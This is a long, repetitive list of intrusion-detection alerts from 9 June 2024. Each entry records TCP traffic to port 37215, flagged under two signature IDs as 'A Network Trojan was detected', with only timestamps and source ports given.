          Timestamp:06/09/24-16:33:39.564421
          SID:2835222
          Source Port:53644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820118
          SID:2835222
          Source Port:57862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297759
          SID:2829579
          Source Port:49728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287978
          SID:2835222
          Source Port:59576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950005
          SID:2835222
          Source Port:38350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594095
          SID:2829579
          Source Port:50170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205915
          SID:2835222
          Source Port:42278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396191
          SID:2835222
          Source Port:53606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248227
          SID:2829579
          Source Port:57242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.988964
          SID:2835222
          Source Port:41970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987489
          SID:2829579
          Source Port:60500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986482
          SID:2835222
          Source Port:33964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284983
          SID:2835222
          Source Port:57960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563555
          SID:2835222
          Source Port:56190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.554139
          SID:2829579
          Source Port:49928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998788
          SID:2829579
          Source Port:38538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993733
          SID:2835222
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038687
          SID:2835222
          Source Port:45068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248746
          SID:2829579
          Source Port:46342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926105
          SID:2829579
          Source Port:38846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105380
          SID:2829579
          Source Port:45868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.075547
          SID:2835222
          Source Port:45212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466841
          SID:2835222
          Source Port:58620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717978
          SID:2835222
          Source Port:52936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818150
          SID:2835222
          Source Port:59014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.090397
          SID:2829579
          Source Port:53578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041422
          SID:2835222
          Source Port:50178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595933
          SID:2835222
          Source Port:42056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998529
          SID:2829579
          Source Port:44382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244305
          SID:2829579
          Source Port:53908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948389
          SID:2829579
          Source Port:45512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102274
          SID:2829579
          Source Port:34818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012850
          SID:2829579
          Source Port:41358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475891
          SID:2829579
          Source Port:43476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.917032
          SID:2835222
          Source Port:42150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291245
          SID:2835222
          Source Port:56066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396718
          SID:2835222
          Source Port:46194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568219
          SID:2835222
          Source Port:57284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466674
          SID:2829579
          Source Port:50280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082792
          SID:2835222
          Source Port:43288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038107
          SID:2829579
          Source Port:47924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539263
          SID:2835222
          Source Port:56136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905347
          SID:2829579
          Source Port:60694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396464
          SID:2835222
          Source Port:45176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034941
          SID:2835222
          Source Port:47458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869866
          SID:2829579
          Source Port:46388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466123
          SID:2829579
          Source Port:56868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414862
          SID:2835222
          Source Port:38036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.948883
          SID:2829579
          Source Port:51252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644403
          SID:2835222
          Source Port:52734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103594
          SID:2835222
          Source Port:37046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918061
          SID:2829579
          Source Port:55776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910583
          SID:2835222
          Source Port:43524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894532
          SID:2835222
          Source Port:33536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205932
          SID:2835222
          Source Port:47050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602190
          SID:2835222
          Source Port:51010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716161
          SID:2835222
          Source Port:38984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465435
          SID:2829579
          Source Port:45922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283769
          SID:2829579
          Source Port:33756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271836
          SID:2829579
          Source Port:57472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721620
          SID:2835222
          Source Port:43422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818139
          SID:2835222
          Source Port:59814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719609
          SID:2829579
          Source Port:42272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.420150
          SID:2829579
          Source Port:35020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929857
          SID:2829579
          Source Port:57690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948510
          SID:2829579
          Source Port:43372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923028
          SID:2835222
          Source Port:57614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075738
          SID:2829579
          Source Port:39894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471452
          SID:2835222
          Source Port:53814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948496
          SID:2829579
          Source Port:58490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715779
          SID:2829579
          Source Port:45808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821512
          SID:2829579
          Source Port:56548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032980
          SID:2835222
          Source Port:54852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301257
          SID:2835222
          Source Port:35426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684600
          SID:2835222
          Source Port:33800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990588
          SID:2829579
          Source Port:44938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991497
          SID:2835222
          Source Port:34110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606783
          SID:2835222
          Source Port:47488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222594
          SID:2835222
          Source Port:35460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165953
          SID:2829579
          Source Port:35480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996281
          SID:2829579
          Source Port:41708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287361
          SID:2835222
          Source Port:60954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300873
          SID:2835222
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080608
          SID:2835222
          Source Port:38790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273698
          SID:2829579
          Source Port:41862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230040
          SID:2835222
          Source Port:48696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244244
          SID:2829579
          Source Port:53942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994803
          SID:2835222
          Source Port:46092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.698426
          SID:2835222
          Source Port:43474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822784
          SID:2835222
          Source Port:44450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079037
          SID:2829579
          Source Port:54284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292509
          SID:2835222
          Source Port:53982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818747
          SID:2835222
          Source Port:33282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076693
          SID:2829579
          Source Port:58376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400049
          SID:2829579
          Source Port:48844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988242
          SID:2835222
          Source Port:44880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398448
          SID:2829579
          Source Port:44892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158333
          SID:2835222
          Source Port:50956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163839
          SID:2835222
          Source Port:39310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986356
          SID:2829579
          Source Port:45540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474618
          SID:2829579
          Source Port:42460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904534
          SID:2835222
          Source Port:38930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250660
          SID:2829579
          Source Port:60546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158281
          SID:2829579
          Source Port:33860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166757
          SID:2835222
          Source Port:55432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287983
          SID:2829579
          Source Port:36074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159674
          SID:2829579
          Source Port:34534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468874
          SID:2829579
          Source Port:47844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285484
          SID:2835222
          Source Port:59468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242627
          SID:2835222
          Source Port:56826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983386
          SID:2835222
          Source Port:35636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230725
          SID:2835222
          Source Port:45764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163120
          SID:2829579
          Source Port:52170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206069
          SID:2835222
          Source Port:56538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103931
          SID:2835222
          Source Port:47296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249670
          SID:2835222
          Source Port:46670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224052
          SID:2829579
          Source Port:57394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029692
          SID:2829579
          Source Port:46606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163009
          SID:2829579
          Source Port:55332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104042
          SID:2835222
          Source Port:33592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919166
          SID:2829579
          Source Port:39486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.946763
          SID:2835222
          Source Port:51158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866154
          SID:2829579
          Source Port:40004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104753
          SID:2835222
          Source Port:42804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469403
          SID:2835222
          Source Port:53692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716078
          SID:2829579
          Source Port:53814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033845
          SID:2835222
          Source Port:55834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074474
          SID:2829579
          Source Port:39224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161099
          SID:2835222
          Source Port:54798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226349
          SID:2835222
          Source Port:39088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539358
          SID:2835222
          Source Port:36270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920902
          SID:2829579
          Source Port:49196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035229
          SID:2829579
          Source Port:51854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987820
          SID:2829579
          Source Port:57112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643686
          SID:2835222
          Source Port:50292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687435
          SID:2829579
          Source Port:50294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417505
          SID:2829579
          Source Port:59232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396756
          SID:2835222
          Source Port:34652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119739
          SID:2835222
          Source Port:52714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819721
          SID:2835222
          Source Port:38286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038685
          SID:2835222
          Source Port:40880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396116
          SID:2829579
          Source Port:57014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950060
          SID:2829579
          Source Port:46032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860390
          SID:2835222
          Source Port:34416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078780
          SID:2835222
          Source Port:57690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288126
          SID:2835222
          Source Port:39912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082905
          SID:2829579
          Source Port:38690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592875
          SID:2829579
          Source Port:50086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719503
          SID:2829579
          Source Port:36082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208224
          SID:2829579
          Source Port:53852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820147
          SID:2829579
          Source Port:39614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012802
          SID:2835222
          Source Port:43466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159541
          SID:2829579
          Source Port:58896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538316
          SID:2829579
          Source Port:41194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599148
          SID:2835222
          Source Port:47616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166867
          SID:2835222
          Source Port:41450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075787
          SID:2835222
          Source Port:52836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557291
          SID:2829579
          Source Port:47226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820675
          SID:2829579
          Source Port:46302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719065
          SID:2829579
          Source Port:32944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077148
          SID:2829579
          Source Port:44146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948009
          SID:2829579
          Source Port:52798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.003578
          SID:2829579
          Source Port:56744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719442
          SID:2829579
          Source Port:37592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539225
          SID:2829579
          Source Port:33076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998766
          SID:2829579
          Source Port:54496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227107
          SID:2829579
          Source Port:48986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645188
          SID:2829579
          Source Port:48886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165637
          SID:2835222
          Source Port:50208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557466
          SID:2835222
          Source Port:53450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396628
          SID:2835222
          Source Port:48518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986633
          SID:2829579
          Source Port:54982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870667
          SID:2835222
          Source Port:59272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947005
          SID:2835222
          Source Port:43530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865906
          SID:2829579
          Source Port:41330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865310
          SID:2835222
          Source Port:51258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292582
          SID:2829579
          Source Port:60026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014944
          SID:2835222
          Source Port:32946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539900
          SID:2835222
          Source Port:46820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605687
          SID:2835222
          Source Port:52326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719417
          SID:2835222
          Source Port:51634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247236
          SID:2829579
          Source Port:57470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985225
          SID:2829579
          Source Port:37118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033772
          SID:2829579
          Source Port:43904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948695
          SID:2835222
          Source Port:43500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.090060
          SID:2829579
          Source Port:50134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.636018
          SID:2829579
          Source Port:43362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296214
          SID:2835222
          Source Port:46456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602010
          SID:2829579
          Source Port:45228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298327
          SID:2835222
          Source Port:44458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162640
          SID:2829579
          Source Port:47220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988660
          SID:2829579
          Source Port:39800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285994
          SID:2829579
          Source Port:58070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.984308
          SID:2835222
          Source Port:33560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917922
          SID:2835222
          Source Port:52876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302579
          SID:2835222
          Source Port:51124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469466
          SID:2835222
          Source Port:36092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277226
